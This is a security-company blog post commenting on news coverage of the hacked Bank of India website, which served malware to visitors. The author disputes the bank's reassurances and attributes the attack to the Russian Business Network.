Its back online. ComputerWorld writes about it:
As a result of the breach, persons coming to the bank’s site were likely to be temporarily redirected to another site where Trojans and other malware were downloaded onto their computers, the employee said. The user was then brought back to the bank’s site.
Well, not exactly. If you weren’t fully patched, your machine was basically hosed with crap while you were happily viewing the site.
The bank’s IT staff thought they had the situation under control Friday morning, until they found that each time they changed the index page for the site, it was immediately replaced by the hackers. The bank then decided to bring the site down.
“The Web site was hosted externally by a hosting company in the U.S.,” the employee said. The bank has since changed the company hosting the service, though the employee clarified that the change in hosting provider had been on the cards even before the hacker attack.
Ok, that might have had something to do with it…
The attack on the Web site did not affect the bank’s online banking operations, according to the employee. The bank’s customers access online banking services through a link on the home page of the bank’s site. The online banking service is provided to users from well-protected servers hosted and monitored within the bank by Hewlett-Packard Co., the employee said.
Well, this perhaps needs clarification. If someone visited the home page of the site, and they were vulnerable, they got infected — and it has nothing to do with whether the servers were protected from HP or anyone else. It’s true that this was not a hack of the bank itself, but we did find at least one data-stealing trojan that someone could have gotten just viewing the site’s homepage.
The bank is as yet not clear about the identity of the hackers, although Sunbelt suggested in its blog that it was a criminal gang, called the Russian Business Network (RBN). “We have called for the logs from the hosting provider in the U.S., and we may have some definite information then,” the employee said.
No, it was RBN.
And from the Height of Irony Department, this article from back in January extols the security initiatives of the Bank of India.
I’m not picking on the Bank of India. This kind of stuff is all too common, and it simply highlights the fact that anyone who has a presence on the web is responsible for insuring that their site is clean and safe for visitors — and especially when you have people like RBN out there, just looking for any vulnerability to use to infect users.
As a final note, credit (long overdue) for the discovery of this hack last week goes to Adam Thomas, in Sunbelt’s malware research team.
Alex Eckelberry